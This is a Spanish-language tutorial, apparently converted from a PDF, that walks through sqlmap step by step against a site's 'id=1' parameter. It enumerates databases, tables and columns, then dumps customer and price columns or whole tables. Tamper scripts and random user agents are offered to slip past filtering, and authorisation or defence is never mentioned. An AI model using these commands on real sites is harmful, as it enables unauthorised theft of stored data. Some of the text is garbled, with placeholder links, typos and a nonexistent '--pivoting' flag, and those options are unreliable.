comandos básicos
-u para agregar la URL
--dbs para la enumeración de la base de datos
--batch para automatizar las opciones
cmd: python [Link] -u “[Link]/[Link]?id=1” --dbs --batch
opcional --threads que van del 1 al 10
cmd: python [Link] -u “[Link]/[Link]?id=1” --dbs --batch --threads
La enumeración finalizada de las bases de datos a veces encuentra muchas de ellas,
simplemente elija una que no sea del sistema, por ejemplo, information_schema master,
sys, ...
opas una enumeración de la base de datos c (--dbs)
Seleccionamos la base de datos y enumeramos las tablas con el comando --tables
cmd: python [Link] -u "[Link] -D public --
tables --batch --threads 10
Aquí seleccioné la base de datos pública y enumeré las tablas usando --tables.
Devolverá una lista de tablas.
Elegimos una y, opcionalmente, si queremos contar las filas de cada tabla, usamos --
count.
python [Link] -u "[Link] -D public --tables -
-batch --threads 10 --count
Las sugerencias de carga útil son útiles cuando falla la enumeración. Algunos ejemplos de
las más comunes son: `--tamper=space2comment` o `--random-agent`.
Estas sugerencias suelen añadirse a la URL cuando falla la enumeración. En este caso, es
fundamental aprender las sugerencias `--hex` o `--no-cast`.
recuento de líneas completado
Ahora enumeramos las columnas, elegimos una tabla o volcamos todo, lo cual no se
recomienda ya que volcará toda la base de datos.
Seleccione la tabla para numerar las columnas utilizando el comando --columns.
cmd: python [Link] -u "[Link] -D public -T
ventas_es --columns --batch --threads 10
Seleccione las columnas deseadas o vacíe la tabla completa.
El comando `-C` en lugar de `--columns` indica que está seleccionando columnas
separadas por comas, y `--dump` significa que desea volcar estas columnas separadas
por comas.
cmd: python [Link] -u "[Link] -D public -T
ventas_es -C cliente,precio --dump --batch --threads 10
Para volcar la tabla completa, simplemente omita el comando -C
cmd: python [Link] -u "[Link] -D public -T
ventas_es --dump --batch --threads 10
Abvora simplemente finaliza el volcado y busca en la carpeta predeterminada o usa el
comando --output-dir="ruta a tu carpeta"
Supongamos que finaliza su volcado
Tenga en cuenta que durante las enumeraciones, se modifican los comandos y se insertan
los valores que enumeran:
--dbs -> -D dbName
--tables -> -T tbName
--columns -> -C column1,column2
Se pueden insertar comandos opcionales al final del comando:
--output-dir="ruta a la carpeta" Este comando redirige la salida de datos a una ubicación
distinta a la predeterminada indicada al final del script sqlmap.
Se sugieren varias cargas útiles:
--hex
--no-cast
--pivoting
--risk --level
--technique=BU ....
Se sugieren varios comandos; esto depende de la precisión de los datos, ya que pueden
alterar significativamente el tiempo de enumeración.
Recomiendo usar solo --tamper=space2comment
--random-agemt
o algún otro personalizado.
También existe la opción --start=, que se utiliza cuando se detiene en un punto específico
y se desea comenzar desde allí. Por ejemplo: --start=10000
Comienza a volcar desde 10 000.
cmd: python [Link] -u "[Link] -D public -T
ventas_es --dump --batch --threads 10 --start=10000
Hay muchos otros; si desea profundizar, lea la documentación. `sqlmap` es una utilidad y `--
where` acepta comandos SQL y puede usarse para filtrar sus datos.
by: paulo takaracha nomuro
telegram: @ptkalcapone
coder PHP, NODE, JS,PYTHON,DART/Flutter
backend/frotend mobile(android)